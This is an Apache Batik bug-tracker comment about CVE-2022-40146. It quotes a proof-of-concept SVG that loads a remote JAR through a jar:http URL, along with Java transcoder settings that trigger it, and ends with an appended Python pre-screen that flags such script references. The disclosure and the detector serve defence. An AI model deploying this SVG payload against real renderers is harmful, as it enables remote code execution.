[ https://issues.apache.org/jira/browse/BATIK-1335?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17629594#comment-17629594 ]
David Campbell commented on BATIK-1335:
---------------------------------------

I understand this is the fix for CVE-2022-40146, e.g. [https://nvd.nist.gov/vuln/detail/CVE-2022-40146]

I also notice that this fix hasn't rolled out in terms of inclusion, for example, to a new build of Apache FOP, e.g. [https://repo1.maven.org/maven2/org/apache/xmlgraphics/fop-parent/2.7/fop-parent-2.7.pom], which still references the build prior, so it could be vulnerable:

<batik.version>1.14</batik.version>

> Jar url should be blocked by DefaultScriptSecurity
> --------------------------------------------------
>
> Key: BATIK-1335
> URL: https://issues.apache.org/jira/browse/BATIK-1335
> Project: Batik
> Issue Type: Bug
> Reporter: Simon Steiner
> Assignee: Simon Steiner
> Priority: Major
> Fix For: 1.15
>
>
> <svg xmlns="http://www.w3.org/2000/svg"
> xmlns:xlink="http://www.w3.org/1999/xlink" width="450" height="500"
> viewBox="0 0 450 500">
> <script type="application/java-archive"
> xlink:href="jar:http://192.168.1.10/poc.jar!/"></script>
> </svg>
> should be blocked when using:
> JPEGTranscoder t = new JPEGTranscoder();
> t.addTranscodingHint(JPEGTranscoder.KEY_EXECUTE_ONLOAD, Boolean.TRUE);
> t.addTranscodingHint(JPEGTranscoder.KEY_ALLOWED_SCRIPT_TYPES,
> "application/java-archive,");
> FileInputStream stream = new FileInputStream("test.svg");
> TranscoderInput input = new TranscoderInput(stream);
> FileOutputStream fos = new FileOutputStream("out.jpg");
> TranscoderOutput output = new TranscoderOutput(fos);
> t.transcode(input, output);
> fos.close();
> CVE-2022-40146
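A defender-side pre-screen for the pattern in the quoted proof of concept (a `<script>` whose `xlink:href` uses the `jar:` scheme, or whose type is `application/java-archive`), as an added example that is not part of this thread or of the Batik/FOP projects. It assumes a deployment that only ever expects `http`/`https` script references, and the sample SVGs are constructed; upgrading to Batik 1.15 remains the actual fix, this only surfaces suspicious inputs before they reach the transcoder.

```python
"""Pre-screen SVG inputs for external script references before transcoding."""
from __future__ import annotations

import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
# Assumption: the deployment permits only relative or plain http(s) script hrefs.
ALLOWED_SCHEMES = {"", "http", "https"}
BLOCKED_TYPES = {"application/java-archive"}


def external_script_refs(svg_text: str) -> list[tuple[str, str, str]]:
    """Return (scheme, href, type) for every <script> element in the document.

    Malformed XML raises ET.ParseError; the caller treats that as a rejection
    rather than guessing at the content.
    """
    root = ET.fromstring(svg_text)
    refs = []
    for script in root.iter(f"{{{SVG_NS}}}script"):
        href = script.get(f"{{{XLINK_NS}}}href") or script.get("href") or ""
        scheme = urlsplit(href.strip()).scheme.lower()
        refs.append((scheme, href, (script.get("type") or "").strip().lower()))
    return refs


def is_suspicious(svg_text: str) -> bool:
    """True if any script points at a non-allowed scheme (e.g. jar:) or is a jar."""
    try:
        refs = external_script_refs(svg_text)
    except ET.ParseError:
        return True
    return any(s not in ALLOWED_SCHEMES or t in BLOCKED_TYPES for s, _, t in refs)


# Constructed sample mirroring the BATIK-1335 proof of concept (host replaced).
POC_SVG = (
    '<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<script type="application/java-archive" '
    'xlink:href="jar:http://example.invalid/poc.jar!/"></script></svg>'
)
# Constructed benign sample: no script element at all.
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg"><rect width="1" height="1"/></svg>'

if __name__ == "__main__":
    print("poc suspicious:", is_suspicious(POC_SVG))        # True
    print("benign suspicious:", is_suspicious(BENIGN_SVG))  # False
```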